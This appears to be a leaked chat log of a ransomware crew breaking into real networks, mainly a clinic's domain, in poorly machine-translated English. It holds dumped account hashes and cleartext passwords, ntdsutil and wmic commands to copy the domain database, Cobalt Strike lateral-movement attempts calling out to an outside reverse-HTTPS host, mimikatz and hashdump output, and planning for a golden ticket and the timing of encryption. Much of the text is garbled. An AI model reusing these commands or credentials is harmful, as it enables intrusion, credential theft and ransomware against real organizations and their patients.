4098 1390 jnelson 9b83e29ef8dde235ec54f98d1beffd01 512 1136 cahayden a0ceddbb1aa337c1af6b4d94e28ba584 544 1538 ENT01A$ a7205703cee8c8cdaf43a0e2a2f46268 4096 1645 wbellman 386d36464667d804aee10c6b8c561bba 66048 1790 MEDTRANS32$ 7dad9afd22753dbefe92c9c26eedafc0 4098 1784 susanmeland f0c5893d75e69a7f7fa768c660d54a55 512 1751 cathefinkelson d9adb2f60146b347249ee9c72b32e168 512 1783 DR-MELAND$ 090b63798080dd2011c08f10eb74c2af55 4098 1423 bonken 1455893cf488171aac6bdf8f38806f02 512 2119 CODING02$ f5ae2004ffb0189f43a20c40101f09de 4098 2122 CODING09$ e48d5d0cbfdada49caf240f967780290 4098 1437 CODING06$ 3c92e31422e99914a62d1ef17c7e9079 4098 1770 acrobatrunner b35c2063adb8a54b6c5311252233ba35 66048 1421 kldolan 70df97f613652cfbf1b71477729acac3 66048 1435 CODING04$ 60dedcde71c812ce6780560fd69e6542 4098 1642 danderson 
57221216bd45b5dfe4a25b4d153f8b7f 66048 1424 jsonmor 23ae3d1dc042d46e3d48bcffa6135611 512 3119 jlknudson 6c1d6e6f39f347c9fe477848cca619b0 66048 1386 dweber e7d216ef2034254bccb3be5aaac569fb 512 1731 luellawilde b741cc9db976bd18d8f1b91310a630c8 512 1403 SURGENTAPPT02$ 2a15b5a7c43cc916e6abbdda0cf62d3e 4096 1724 MEDRECORDS12$ 9f26b4e815a8ce8009dea4920d6cddfc 4096 1500 CODING10$ 4d43fc92304d6ce3c2ae8abbcd2b82f6 4098 1436 CODING05$ 96d93098e5e4fd1cedf32bc5e507c721 4098 1497 thurley bdcb6ed5aaf69ecf3caaf6ded34ed187 512 1317 PATIENTCARE02$ 013ccea833864184915572aea6365f3e 4096 1831 camavis 90f90b95d77ecb3778195ca19b9563ea 66048 1146 jashaikoski 8384445ee87621f5ec558039a4631833 66080 1720 maryabel 46367430424fbf5c2fd1adfd380c9e81 512 1605 fayeluedtke 70febca3d46411d71e9f50e49f9a182d 512 1485 kthompson 5fe0547692cbee29eb92f4b698c9fa28 512 1364 ENG01$ 9df2339a964df1a4e0d85d2ca6d8d4a4 4098 1693 lindazumwalde e0310fc15582693dba137f3e93c155ca 512 1712 MEDRECORDS06$ f372076b23c85f422c35f47616176c86 4098 2189 MEDRECORDS08$ 6df2272cb95f3f6af051b7737bea9eac 4098 1718 MEDRECORDS10$ 3252dda8926954e94867f55a7e7d8d9d 4098 1503 MEDRECORDS05$ 6ca331809512429a2b9edd3f9cf9c407f 4098 1299 MEDRECORDS01$ 4d709f5e955d8e32174979ba2b1f5cd2 4098 1192 gsmith 05f6a65ad9c1fb1c9abf6899ac55a7d8 544 1165 medrechsel 79d4f47bd7b89fa72e6b9f0719fd6ac9 66080 1722 carmenharthun c4de1a0ae7f923d7861b1bed5d2019e9 512 1762 ADMINLAB$ 621078dec419cc0153ec2ea362014893 4098 1725 IT03$ 50edfa32dcce01dbce63fc9e449c9557 4098 2180 LAB-CE$ 7c23bff5b540f96e98adef97ad3d863bf 4098 1277 tbeckman 64fcf9524a8d61554c06b754fe1dadbd 544 1428 DATAENTRY03$ 89017be548f1b27c632bbe4b8e821b06 4098 1349 SUPPLY01$ c52c16282789ab761cd4ea92b1c05209 4098 1736 paristurchin 336939d0398c5016ce01ad37d23489d0 512 1680 michaelstreeter af75fd1d30727b604e54cb0404b9aa73 512 1348 SUPPLY02$ bf38f8f55f5518ef5cedf5d5e8870606227 4098 1830 kmtripp 9b2c87cfc4d6968b0ed10630b6138a80 66048 2205 MEDRECORDS09$ b495b0e02995c7160a4d3776173696b7 4098 1138 dbickett 
919673f08ba0c45e38f9ba80a6cf6743 544 2206 HIS02$ aaadb45ca5308c8b2dc85ab2ca9f88fd 4098 1759 jlthunselle e4c329e69525291304a7d2807c89477b 66048 2154 MEDTRANS18$ 37943d911273289823301046e409270e 4096 1484 ce 16a0d9d05151fbec94d639acd77de80f 512 1162 lmartinson 828c06926dd7bf768f221da9536d81e6 544 1734 dantraiser 6f8b963b591710020e97282122d76d6d 512 1733 DR-TRAISER$ bc9a39b235088b15aed358218054ffb4 4098 1155 jteberg 285be705f27066ffeb749df472526c40 544 1834 DATAENTRY05$ 5ce664f9069ad66cfe028c8006263b86 4098 1752 daynaerlandson d04abeb82271f38086e50647d70fa40c 512 1294 MEDTRANS08$ b48bd52d07c6dd1c034dcd948d45cf2f 4098 1709 larryeisinger 26c5286aad4cc5a67d6c1b498ba66878 512 1686 markiekolle 018f65735e1074613ff794f9b92e7b02 512 1707 DR-EISINGER$ 1943833f411bc4b3a51ae287cbacec4f 4098 1122 avolden$ 298fb92a616f5da3eb1864e5d735752b 544 1689 MEDTRANS26$ e0ed30831a40022ba6c8a732e77a0a46 4098 1124 abratvold 5a5f7930e60d529ec0bb0a8879c6eee1 544 1587 DATAENTRY06$ 6a281a5c3158a4a3576100009ba280fa 4096 1276 jrandklev$ 2434fbe3038f32d0d1544013f0844afe 544 1302 HIS01$ 720e44a6eb61ea47d68cc27f40d6177c 4098 1581 delreynolds e4778cc4b69b5fc1eae8aa49eb804639 66048 1401 rerickson 401d242537a8f35c06b50019a44791f9 512 1730 ksdenker 2d782825f402ebf523ce5422c31a5227 512 1774 ADMIN15$ ebc356bc3ea81b6273c92586bf76561c 4098 1131 blaplante 8b724fbf190e7209879b9a1b89718dc9 544 2186 MEDTRANS29$ c08b9170bfb281c2d35b1228f395e8d0 4098 1382 sltripp 66542a4a152b38d00dd42533f8953770 66048 2195 MEDRECORDS14$ 4905614a001a41b372a881c9f76cc026 4098 1641 MEDTRANS21$ d849917f9b96d5810b6e027c485e5c90 4098 1708 eawilliams 36f8dee2ff0c6e543fd59c047f67c8d2 512 1714 DR-WILLIAMS$ 359792954bf28f2d0836c7967b256b4b 4098 1717 kayhutmaker$ 104a6f91703ac0329a712517baffa744 512 1775 MEDTRANS30$ d82e98e8f2a6e8c61b354e23de0122b2 4098 1607 gdhoff 86f6f2a7d63c02a5e599b1f921fe3ed3 512 2184 MEDTRANS28$ 6ba60bc00f1be322456fce022f1665ce 4098 1381 jkummrow 1b5b791b7e471036ce91137bc46d7386 512 1389 jrosin 
e05b3ccb827fc73e848e2e0646cd7a67 512 1728 OBPEDSAPPT02$ 23449777b9231d2d628efb4e47036d2c 4098 1173 rhammer b62f335f1eb14d11d05b7907baebb25b 544 1690 MEDTRANS27$ e0019570012f7329ccb2bd5e325fca95 4098 2178 WINSCRIBE$ 71d4de1e32f49a3ae2fbf8eb9e786db9 4098 1498 bhensch 916e7c5dfbec96e4d35447cb6b8f806e 512 1391 vmlink 08fdb4e2e1079a9a4a945028b6ab145a 66048 1179 sadavis 29891948443c85202ac9577e9e697e39 66080 2108 OBPEDS01$ 5f2193fb711f90a25eb7c8c399076d37 4098 1657 INSURANCE10$ e262ea6b7c8dad65f3f8e58eff54a898 4096 1387 mrloomer 57ea43193566ca1253347cd3afc1adb4 512 2654 bmschaible 67613f04680f8da46b2e6579a5205e46 66048 1135 cschmidt 37f1101464c66c68e5c512f9e1491fe7 544 2162 ORTHO01$ d338616df9cc1d70fa2e08e172315675 4096 1727 ffmaas 5cadeb11a161c1a7417ba56926de364c 66048 3111 nlppreston b80247b675268f128aadab632bdfcbab 66048 1739 juliannegutzmer 3f9bfd262caed9b0918ff698f290d982 512 1738 DR-GUTZMER$ 519cef4a3d321df140ad54821a2a7497 4096 1715 ffmbbs f06a94213f76b2f61caec468d45dfca4 66048 1716 ffmccs d10b57d2c5e69612b00c5c82121ce63f 66048 1719 MEDRECORDS11$ d0cb151bf2325184a0de92cf4e3e6248 4098 1710 MEDRECORDS07$ a4687be951806e156685748ba68233ed 4098 2167 TEMP02$ f3f68ee581369da5d6d1072387d062c1 4096 1537 KINETX$ 0e2b2c7d94ba335b9e6c80064d863043 4096 1197 mjacobson 83dc1589b41accbc0d5f04fd6aad4630 66080 1480 ADMIN03$ 0a73059f17e014e9172d8ffb138ceb85 4096 2158 QI01$ 58bab78a3981f067f8b2f12081b0635e 4098 1787 mardelle2 2297d8cf9db7ef8e80db486710b082c6 512 2636 jcbengtson 71c261a2f43ffe580f929d63cc07f70c 66048 1637 jdpeterson 4f48102cd374701781ed3036f4f83829 66048 1613 ADMIN07$ bd487166d574a7d1d59bd4fea97dc7a1 4098 2155 ADMIN05$ 266291d521f651cefcc7277fc25b3cb2 4098 2202 CLINICDC2$ be3a8c6316fbc0d4a155218bc4a93bae 4096 1446 replicadb 3b89729a25618c03434dc1275fe496ef 66048 1439 REPLICA$ 3d57307d1f18c68e42f4fcbabaeae4be 4096 1438 REPLICAFS1$ 310cd89aa1613a6a62349fcef6241d8f 4096 1576 LIGHTSPEED$ c7c102c07f6595952417b47b5f997412 4096 2126 IWAM_CLINIC2 
686fd72eb5e43917c12bb5d41e7d1571 66080 2640 slmontella 339a9f43281e1d64712917d8b34ab34e 66048 1532 bjfindley 4fa0eb1764110e17db8dca13083c9df4 66048 1181 skilde 963c613cd50f2329f8eb925269a4b629 544 1583 ambetlach bfb0556340211875cd1cfc20e151aa69 66048 1493 ADMIN01$ e963b81b5a2f9242cd78d52d4d1e99f0 4096 1199 kpeterson 5b4c6335673a75f13ed948e848f00840 66080 1195 dktoso 69cb9baf0f396225965fd96c89102c92 544 1278 ldsander e2a2964ed651c0f7ba4ec81dd01e02aa 544 1137 dmanderson 07777311adb9fea327708e8b1ff840ea 66080 1555 smrodriguez afde914ef03a7f99c1e400d70451a5c2 66048 2638 kjbockman 5cb6367e176a3a44fd38aac5e1a51d 66048 1377 CLINIC2$ 660b3b39a9c4bd6420f0718d6d26cd80 532480 2125 IUSR_CLINIC2$ 5065cfab3c248199d577f2ca163213e6 66080 1785 smwhite 79689536e1dc2b70ae72862d77f966e6 66048 1154 jrdimke 1384e297265d100a0116e95f6b08d484 66080 3109 nrgeiszler 2a537afe9be53ebfabebf00c5b7c0c56 66048 1760 paragonrunner 03cc1b1a34914c14a3a44d06aab0a01b 66048 1554 sdthormodson 9e0add2cee1b4c84a7bb6d39456b32f3 66048 502 krbtgt bc039777432092c373c4760ae8907cbc 514 1001 SUPPORT_388945a0 f72f792aaf39648489e5865c72fd763a 66048 1664 petekuttera e65e7043f9e8c2321284f39e830a51ba 512 1184 tkadmin 81199155c72235ba7ee1e4b39da00702 544 1665 glendahoffa 94de31b62705ce9e325a95982e42752c 512 1003 beadmin ee32e572565734a3322bbd2fd90fd750 66048 2655 allscriptsadmin a1b22e43fe47976bb230e1e3497576bf 66048 2657 SophosSAUCLINICDCaa 1c1095437ae57d2ba6234c2615241519 66048 1550 mmlaugtug cfe2ff7138ac7cdc3ff264ea8b2a2e20 66048 1820 LRHC$ dd20d36f182fee4dad615eee4384046f 2080 2201 CLINICDC$ 690e62a948fd60c5c42cfddacdfeb106 532480 2656 PAULSANDERSON$ e6b7f965ec1dff907e9e9ee6158e4f10 4096 1004 CLINIC$ 174b5ffdef84b0c4b86f9ad41bface94 4096 1242 psanderson 8a48ebb4e8aadeb8f71b999ba84ab520 66080 2145 AUDIOLOGY2$ 6e02b8d4411ecbde4d04abad2d097bfb 4096 1189 WinScribe 3d1a6aecc94c7ca42f1687fe84466dc3 66080 1255 lkkrog a420b3f79ddc9eaa1155897dbac8ae7a 66080 1425 dastone 38abadb3519dc46f5290da34e1edb7f8 66048 1220 ljbecker 
712eac9ea2f2a45f40d1e2b13bbf1d5d 66080 1148 jcjohnson 792508dbd7d9693b9e7ce078e9c43885 66080 1186 tleliason af61440f9a461322e1c2fc7b5e0c28de 66080 500 Administrator 8cb7e0d1806e8bb55dee9954e2d8bdfd 66048 ``Everything works okcredits but the session does not arrivenu there is a quarantine still+yet even server 2000 it is the last impregnable trust? in this trust all XP and 2003vot so there dk 2003 x32? seriously?but it worked fine and in the input domain was sofossofos in all the trusts what os? and the text is shifting itself like this just sit there is a line transfer? check it in the batcik it is yes i copied here crookedly2) where is the last q? ``` ntdsutil "ac in ntds" "ifm" "cr fu c:\windows\temp\ntds" q q ``1) check if ntdsutil.exe is not complete Teemo[LRHDC03]SYSTEM */556|2020Dec18 21:26:49> shell type \\CLINICDC\C$\toddcommands\1.txt [*] Tasked beacon to run: type \\\CLINICDC\C$\toddcommands\1.txt [+] host called home, sent: 68 bytes [+] received output: ntdsutil: ac in ntds Error 80070057 parsing input - illegal syntax? ntdsutil: ifm Error 80070057 parsing input - illegal syntax? ntdsutil: cr fu c:\toddcommands\ntds Error 80070057 parsing input - illegal syntax? ntdsutil: q ``now again puneomotecheck if the service is disconnected and the assumption was made that we have only redirected to the file browser and also to begin with show the outputIt happens that ntds catches an error or something else then the path is more complicated what does thetasklist say?there's someone stop the service through the file browser and I don't see the command dir c:\windows\temp\nds and the easiest way to find out what's wrong is to redirect the command to the file on the desktop. 
Teemo[LRHDC03]SYSTEM */556|2020Dec18 21:03:14> shell sc \CLINICDC query vss [*] Tasked beacon to run: sc \\CLINICDC query vss [+] host called home, sent: 54 bytes [+] received output: SERVICE_NAME : vss TYPE : 10 WIN32_OWN_PROCESS STATE : 1 STOPPED WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0 Teemo[LRHDC03]SYSTEM */556|2020Dec18 21:03:30> shell sc \CLINICDC start vss [*] Tasked beacon to run: sc \\\CLINICDC start vss [+] host called home, sent: 54 bytes [+] received output: SERVICE_NAME : vss TYPE : 10 WIN32_OWN_PROCESS STATE : 2 START_PENDING (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0 PID : 53772 FLAGS : Teemo[LRHDC03]SYSTEM */556|2020Dec18 21:03:49> shell sc \CLINICDC query vss [*] Tasked beacon to run: sc \\\CLINICDC query vss [+] host called home, sent: 54 bytes [+] received output: SERVICE_NAME : vss TYPE : 10 WIN32_OWN_PROCESS STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0 ``qw.bat ``` ntdsutil "ac in ntds" "ifm" "cr fu c:\windows\temp\ntds" q q `````` Teemo[LRHDC03]SYSTEM */556|2020Dec18 21:10:53> shell wmic /node:CLINICDC process call create "cmd /c C:\qw.bat" [*] Tasked beacon to run: wmic /node:CLINICDC process call create "cmd /c C:\qw.bat" [+] host called home, sent: 89 bytes [+] received output: Executing (Win32_Process)->Create() Method execution successful. Out Parameters: instance of __PARAMETERS { ProcessId = 56968; ReturnValue = 0; }; ``Schaa well smirivsm? Let's not predictionsa folder no chota do as I shot remotely of course)) and then the dk in the coba does not stretch? through ntds realistic to shoot if there is LA on dk@tl1horoshoda-so such computers that `Destination host unreachable`, leave alone? Pinging NSTORE0.mcklrh.mig [192.168.254.110] with 32 bytes of data: Request timed out. Request timed out. 
Request timed out. Request timed out. Ping statistics for 192.168.254.110: Packets: Sent = 4, Received = 0, Lost = 4 (100% loss), Ping from onehost not responding from all machines is not responding ok? From another machine may not responding from "destination host not responding" from another machine is not responding from another host saying that the host you are requesting is not found. beacon> shell ping NSTORE0.mcklrh.mig [*] Tasked beacon to run: ping NSTORE0.mcklrh.mig [+] host called home, sent: 54 bytes [+] received output: Pinging NSTORE0.mcklrh.mig [192.168.254.110] with 32 bytes of data: Reply from 192.168.254.92: Destination host unreachable. Reply from 192.168.254.92: Destination host unreachable. Reply from 192.168.254.92: Destination host unreachable. [+] received output: Reply from 192.168.254.92: Destination host unreachable. Ping statistics for 192.168.254.110: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), ``` ``` beacon> shell dir \\192.168.254.110\C$ [*] Tasked beacon to run: dir \192.168.254.110\C$ [+] host called home, sent: 55 bytes [+] received output: The network path was not found. ``` ``` beacon> jump winrm 192.168.254.110 [*] Tasked beacon to run windows/beacon_bind_pipe (\.\pipe\msagent_42) on 192.168.254.110 via WinRM [+] host called home, sent: 194407 bytes [-] Could not connect to pipe: 53 [+] received output: #< CLIXML [192.168.254.110] Connecting to remote server failed with the following error message : The WinRM client cannot process the request. Default authentication may be used with an IP address under the following conditions: the transport is HTTPS or the destination is in the TrustedHosts list, and explicit credentials are provided. Use winrm.cmd to configure TrustedHosts. Note that computers in the TrustedHosts list might not be authenticated. 
For more information on how to set TrustedHosts run the following command: winrm help config. For more information, see the about_Remote_Troubleshooting Help topic. + CategoryInfo : OpenError: (:) [], PSRemotingTransportException + FullyQualifiedErrorId : PSSessionStateBroken beacon> jump winrm 192.168.254.110 https [*] Tasked beacon to run windows/beacon_https/reverse_https (palside.com:443) on 192.168.254.110 via WinRM [+] host called home, sent: 198121 bytes [+] received output: #< CLIXML [192.168.254.110] Connecting to remote server failed with the following error message : The WinRM client cannot process the request. Default authentication may be used with an IP address under the following conditions: the transport is HTTPS or the destination is in the TrustedHosts list, and explicit credentials are provided. Use winrm.cmd to configure TrustedHosts. Note that computers in the TrustedHosts list might not be authenticated. For more information on how to set TrustedHosts run the following command: winrm help config. 
For more information, see the about_Remote_Troubleshooting Help topic. + CategoryInfo : OpenError: (:) [], PSRemotingTransportException + FullyQualifiedErrorId : PSSessionStateBroken ``` ``` beacon> jump psexec 192.168.254.110 https [*] Tasked beacon to run windows/beacon_https/reverse_https (palside.com:443) on 192.168.254.110 via Service Control Manager (\\\192.168.254.110\ADMIN$\bd450eb.exe) [+] host called home, sent: 287818 bytes [-] could not upload file: 53 [-] Could not open service control manager on 192.168.254.110: 1722 beacon> jump psexec 192.168.254.110 pipe [*] Tasked beacon to run windows/beacon_bind_pipe (\.\pipe\msagent_42) on 192.168.254.110 via Service Control Manager (\\192.168.254.110\ADMIN$\05ebb47.exe) [+] host called home, sent: 287872 bytes [-] could not upload file: 53 [-] Could not open service control manager on 192.168.254.110: 1722 [-] Could not connect to pipe: 53 Give me the command and output the full output. Reply from 192.168.254.92: Destination host unreachable. Ping statistics for 192.168.254.110: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), If it was resolved normally before then, does that mean the host is offline? What should I do with it? It's logical that no ping or httpsjump doesn't work@tl1 If a host on a ping ``` Destination host unreachable ``` and when I ask for a dir ``` The network path was not found. ``` is it realistic to pull it in at all? ``` Msf::OptionValidateError One or more options failed to validate: RHOSTS. `tu ta, he off status does not change in any way @user3 where? emho mc17 knocked in that domain :thinking:checked rights in this domainto and smb_login also did soProbably I understand if it by ip pulls cars from current domain on 1-2 hosts not sure but it is worth trying in smb_login can specify hostname instead of ip in rhosts? 
so and yet try to try not \\10.5.50.192\ а \\Maybe just ping the hostname instead of \audiology2.ffmg.local\and maybe just ping the hostname?:thinking:compare results with the one from the vulnerable one and from there ping another host from that domain ping the one you want and ping it through the one I showed you above. [*] 10.5.50.192:445 - Output for "net localgroup administrators": Alias name administrators Comment Administrators have complete and unrestricted access to the computer/domain Members ------------------------------------------------------------------------------- Administrator FFMG\Domain Admins FFMG\psanderson LRHC\pdsanderson The command completed successfully. ``This was pulling ``` paulsanderson.ffmg.local [10.10.220.45] >operatingSystem: Windows XP Professional ``` it came up with this ``` Host Name: LRH001240 OS Name: Microsoft Windows 10 Pro Registered Owner: lrhc Alias name administrators Comment Administrators have complete and unrestricted access to the computer/domain Members ------------------------------------------------------------------------------- Administrator LRHC\Domain Admins LRHC/Nessus Local Access LRHC\Paragon_Users ``Did you pull syseminfo off the machine, is the hostname the one you pinged there? is the domain name full give an example of an addendum is hostnames how did you collect ipses here? @echo off setlocal enabledelayedexpansion set OUTPUT_FILE=result.txt >nul copy nul %OUTPUT_FILE% echo HOSTNAME,LONGNAME,IPADDRESS,STATE >%OUTPUT_FILE% for /f %%i in (ips.txt) do ( set SERVER_ADDRESS_I=UNRESOLVED set SERVER_ADDRESS_L=UNRESOLVED for /f "tokens=1,2,3" %%x in ('ping -n 1 -a %%i ^&^& echo SERVER_IS_UP') do ( if %%x==Ping set SERVER_ADDRESS_L=%y if %%x==Ping set SERVER_ADDRESS_I=%%z if %%x==SERVER_IS_UP (set SERVER_STATE=UP) else (set SERVER_STATE=DOWN) ) echo %%i [!SERVER_ADDRESS_L::=!] echo %%i,!SERVER_ADDRESS_L::=!,!SERVER_ADDRESS_I::=!,!SERVER_STATE! >>%OUTPUT_FILE% ) how did you ping hosts from trust? 
I'm talking about it,are you in trust domain? although in trust domain 10ok net systeminfo says there are 10 vindatk net domain in them gives out the current domain there is a suspicion that the cars in the current and trust domain match ipi and therefore cars from the current domain are pulled smb_logney can specify the hostname instead of ipi?check also the processes, os, avi t if not servers, then browsers check more processes[ ](https://mediaeveryone.com/group/lrhc-org?msg=mhrk8J5bowbKdJ4hp) some of them are not attracted, and those that are attracted, no cracks at all ``` beacon> hashdump [*] Tasked beacon to dump hashes [+] host called home, sent: 82541 bytes [+] received password hashes: [-] no results. beacon> logonpasswords [*] Tasked beacon to run mimikatz's sekurlsa::logonpasswords command [+] host called home, sent: 296058 bytes [+] received output: ERROR kuhl_m_sekurlsa_acquireLSA ; Key import ``user3 to and from the dedicator Copy not directly load through the kobone in what, just clarifying. archiver will pass in what problem? KB How to treat file download? It is necessary to download an exe to download the archive from ff. Is there info? I mean, it's worth a try, there is no alternative) well, such ... not that "wildly" noisy there are LA Credits on one of the servers) want to run sharfinder, it's noisy?, leave for half an hour I know that you can pull browsers if it's ff) there's still a sphere We're not noisy yet, we're walking the net gently. but without noise we can not get the crescendos from the sphere, so that on the day of closing we'll have to look for the sphere at once)~9 am, then for it is more likely to allocate the morning + I am so, to be aware of this particular one can move the network is still not ready for closing `` `` The current time at \HJ-PRT-AZPROD.evo.local is 1/6/2021 8:54:24 AM ``` I think our default time to start at 03:00 here is not very suitable. 
At 3 am - will be 16 days.Yes, and the network is not as bigtam admin vigil my respectMaybe even on the system are runes from the evil eyeThat thing they have https://redcanary.com/ `` `` 192.168.9.251:445 (platform: 500 version: 6.2 name: EPSON1BBE6E domain: WORKGROUP) 192.168.9.102:445 (platform: 500 version: 5.0 name: DOCKPRT domain: WORKGROUP ) EPSON WF-3540 Series 192.168.9.138:445 (platform: 500 version: 4.9 name: DC_CRTV_NAS1 domain: WORKGROUP) https://www.promise.com/Policy it also has a tendency to detekeneeneene refuse vmikai as soon as you start will go back report without the possibility to interrupt the process just need to do when no one before closing can noise) Prepare a network taka how to get Codes then?) kb most likely noticed by Golden Ticket katintds, dxink us not to remove? from the entry point under the vpnS-1-5-21-2479520119-439608908-2710113943user9[ ](https://mediaeveryone.com/group/evo-com?msg=juRtha4EjgGzs368R) In the chat room did not find the unlikely to change there krbttgolden ticket do iten I remember you ntds threw? can consult with colleagues while you have thoughts - doThe only thing that comes to mind, check through msf for holes... I have no experience with this situation (to raise the rights) to what? You have changed tasks while you work here, then do not validate where to roll check on the dk` `` scanuser abc123$ - VALID FOR DC work only from the entry pointChecked all the creeds (I mean if you use ms17 depending on how you set upMSF also burns fast Kb Right? Yes, I checked folders. folder? should have looked at processes and ctrl+f cb.exe)[ ](https://mediaeveryone.com/group/evo-com?msg=4yn2FwMFtnBJDw3yy) checked the wrong folder and jumped for joy (try again raise the rights for nothing you then climb.... 
the passwords changed + Captured the sheet as you raise the load give me a load``` 172.93.201.193 https://keymiss.com ---------------------------------------------------------------------------------------- 104.243.45.15:59880 Qlxso4SdwP3QODfp9NHqoxUb1qXy6OaeLka ``I'll give you a replacement, then we'll kick you out for 2 days maximum along with this one. So they're looking for our entry point. So they've worked off the Buy More...EVO.LOCAL what's your cob...EVO.LOCAL what's your domain? ``` UserName : richards@continuant.com Password : MyW0rdPassW0rd! ``Now I need credentials to connect to the vpnUnlocked that sofos and opn vpn are the sameuser4user1pazhalustokin @user1 here:zany_face:and there's 6 hours there seemed idle time 0 hours 50 minutes stopmy guess they turned off the vpn for lunch there time 01:43 PM``` ====== IdleTime ====== CurrentUser : NT AUTHORITY\SYSTEM Idletime : 06h:50m:34s:109ms (1234234109 milliseconds) ``On the other computer TOSA is LA''. beacon> hashdump [*] Tasked beacon to dump hashes [+] host called home, sent: 82501 bytes [+] received password hashes: Administrator:500:aad3b435b51404eeaad3b435b51404ee:9f42fb1ba6b3f4d6eb0ee00efb127225::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Teddybear:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: TOSA:1002:aad3b435b51404eeaad3b435b51404ee:bc89b78c7c12fd09c32b057a8e6d9ea6::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:fc6774e019e6b30db2715b90caa59d97::: `````` Authentication Id : 0 ; 2182928437 (00000000:821cd835) Session : NewCredentials from 0 User Name : richards Domain : TELECOMLABSINC Logon Server : (null) Logon Time : 10/20/2020 11:08:16 AM SID : S-1-5-21-2126783548-1955098733-1885625156-12800 msv : [00000003] Primary * Username : Guest * Domain : . 
* NTLM : 3d2b4dfac512b7ef6188248b8e113cb9 * SHA1 : bc7d6d066111172ffd532d3de3967638b3f2c4b8ce * DPAPI : 7def96ac9eab53c5eedb2fe0c01bb5d8 tspkg : wdigest : * Username : Guest * Domain : (null) * Password : (null) kerberos : * Username : Guest * Domain : (null) * Password : Guest ssp : credman : Authentication Id : 0 ; 3241371 (00000000:0031759b) Session : Interactive from 1 User Name : richards Domain : TELECOMLABSINC Logon Server : FIFE-DC01 Logon Time : 10/6/2020 6:58:15 AM SID : S-1-5-21-2126783548-1955098733-1885625156-12800 msv : [00000003] Primary * Username : richards * Domain : TELECOMLABSINC * NTLM : 28c269c13bc52e3173e95e32a3b59086 * SHA1 : 2c4f93e65137e41d0d0726b29b75163e65d093b2 * DPAPI : 7d405a8c6affa51928af3bdf7ce47276 tspkg : wdigest : * Username : richards * Domain : TELECOMLABSINC * Password : (null) kerberos : * Username : richards * Domain : TELECOMLABSINC.COM * Password : (null) ssp : credman : [00000000] * Username : richards@continuant.com * Domain : autologon.microsoftazuread-sso.com * Password : MyW0rdPassW0rd! Authentication Id : 0 ; 3239772 (00000000:00316f5c) Session : Interactive from 1 User Name : richards Domain : TELECOMLABSINC Logon Server : FIFE-DC01 Logon Time : 10/6/2020 6:58:15 AM SID : S-1-5-21-2126783548-1955098733-1885625156-12800 msv : [00000003] Primary * Username : richards * Domain : TELECOMLABSINC * NTLM : 28c269c13bc52e3173e95e32a3b59086 * SHA1 : 2c4f93e65137e41d0d0726b29b75163e65d093b2 * DPAPI : 7d405a8c6affa51928af3bdf7ce47276 tspkg : wdigest : * Username : richards * Domain : TELECOMLABSINC * Password : (null) kerberos : * Username : richards * Domain : TELECOMLABSINC.COM * Password : (null) ssp : credman : [00000000] * Username : richards@continuant.com * Domain : autologon.microsoftazuread-sso.com * Password : MyW0rdPassW0rd! 
Authentication Id : 0 ; 102596 (00000000:000190c4) Session : Interactive from 1 User Name : DWM-1 Domain : Window Manager Logon Server : (null) Logon Time : 10/6/2020 6:55:40 AM SID : S-1-5-90-0-1 msv : [00000003] Primary * Username : L-7NB3HC2$ * Domain : TELECOMLABSINC * NTLM : 881a8b31fa3a3a2ffc06751e5ada89c1 * SHA1 : 782d12bcee0c5aa3bf6d0cc98b32705ff7f5194e tspkg : wdigest : * Username : L-7NB3HC2$ * Domain : TELECOMLABSINC * Password : (null) kerberos : * Username : L-7NB3HC2$ * Domain : telecomlabsinc.com * Password : c5 5c 13 59 42 d3 fa e2 e3 c8 50 7a 73 0d e4 14 17 fb 1f 9c ac f9 56 68 59 52 81 3e 01 d7 13 af 10 59 ca e2 74 c3 d1 34 b9 b8 ea 67 f7 59 39 ad 5e ad ed c5 4e f0 ec 8a c0 47 aa 88 8a 95 68 77 ba e2 93 b0 5c 0b 1b 1f e3 24 b8 6d 27 21 48 ad af 36 24 4d ee 57 52 5d 5d 91 64 26 7d a9 be 4b c3 1b 3a 94 f8 c4 69 6b 3a 97 95 ef 3b ce 78 2d a6 48 c2 ce 6b 64 ce 06 e5 14 a8 6a 5a 0c de b0 24 e6 78 8e 36 75 76 a0 d4 96 a1 99 c8 8d 6f 02 1c 12 e1 a2 ee c1 78 8e a0 a4 20 62 c5 48 9c 30 60 12 7f c6 7f cd 28 6c 5f b6 77 91 85 a2 d3 54 fb 83 c0 54 a5 9b f5 4b ec 0a f4 0d ec 4a 1b 65 51 59 ab 4c 60 73 1f 84 fb af 90 92 35 8c a2 ec 3b f8 99 c9 27 a3 d2 50 a8 19 e5 92 b6 a5 22 8f 5c 3f b0 85 56 0d 80 41 51 78 17 88 cb 60 1d a0 ssp : credman : Authentication Id : 0 ; 102551 (00000000:00019097) Session : Interactive from 1 User Name : DWM-1 Domain : Window Manager Logon Server : (null) Logon Time : 10/6/2020 6:55:40 AM SID : S-1-5-90-0-1 msv : [00000003] Primary * Username : L-7NB3HC2$ * Domain : TELECOMLABSINC * NTLM : 0e974cf2252722b48baf65ee2f9db6e2e * SHA1 : 4dbdbdbf0c53cbb22db6b49aa49709974dd4c0ed94a tspkg : wdigest : * Username : L-7NB3HC2$ * Domain : TELECOMLABSINC * Password : (null) kerberos : * Username : L-7NB3HC2$ * Domain : telecomlabsinc.com * Password : 49 69 69 a2 6a bd c5 80 d7 48 10 01 73 3e e4 3f 9e de 97 9c 9d 08 b6 ab e6 81 13 4c b3 13 d2 68 66 94 60 66 02 60 c1 ac fd 58 d7 72 dd 90 b8 eb fb 9c 92 de 97 59 cf 28 22 e4 f4 d5 b2 df 90 39 0d c9 
